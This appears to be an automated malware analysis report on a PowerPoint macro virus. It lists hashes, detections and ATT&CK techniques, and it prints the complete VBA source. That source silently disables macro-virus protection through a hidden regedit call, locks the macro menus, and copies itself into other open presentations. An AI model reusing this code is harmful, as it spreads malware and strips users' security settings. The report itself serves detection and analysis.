Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2375e02a9dbe8d9f…

MALICIOUS

Office (OLE)

Size: 15.0 KB
Created: 1601-01-01 00:00:00
Authoring application: Microsoft PowerPoint
First seen: 2012-06-14
MD5: bef265554db7d0dbf08d3b518c178905
SHA-1: 392c673d7bafb40ac780399a7b2a8836d1b491c1
SHA-256: 2375e02a9dbe8d9f405b90973445fa202419bf6b882fe4c992d453e235020387
Risk Score: 200

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1553.005 Security Software Installation
  • T1070.004 File Deletion

The sample is a malicious PowerPoint file containing VBA macros. The macro attempts to disable macro security by writing to the registry and then spreads itself to other open presentations by exporting and importing its code. It also attempts to delete the exported macro file.

Heuristics 3

  • ClamAV: Win.Trojan.PP97M-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.PP97M-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1039 bytes
SHA-256: 4e7eacbff5477f5838506bb5237cf3e77b5f7021dc25a373e29e8609fdad4a99
Detection
ClamAV: Win.Trojan.PP97M-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "LACOPHRONE"
Sub LACO()
On Error Resume Next
With ActivePresentation.VBProject.VBComponents("LACOPHRONE")
.Export ("C:\CONFIG.LAC")
End With

With CommandBars("Tools")
.Controls("Macro").Enabled = 0
.Controls("Customize...").Enabled = 0
End With
Open "c:\power.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\PowerPoint\Options]"
Print #1, """MacroVirusProtection""=dword:00000000"
Close 1
Shell "regedit /s c:\power.reg", vbHide
For i = 1 To Presentations.Count
If Presentations(i).VBProject.VBComponents(1).Name <> "LACOPHRONE" Then
With Presentations(i).VBProject.VBComponents
.Import("C:\CONFIG.LAC").Name = "LACOPHRONE"
End With
End If
Next
For Each kilo In ActivePresentation.Slides(ActivePresentation.Slides.Count).Shapes
With kilo.ActionSettings(ppMouseOver)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
With kilo.ActionSettings(ppMouseClick)
.Action = ppActionRunMacro
.Run "LACOPHRONE"
End With
Next
End Sub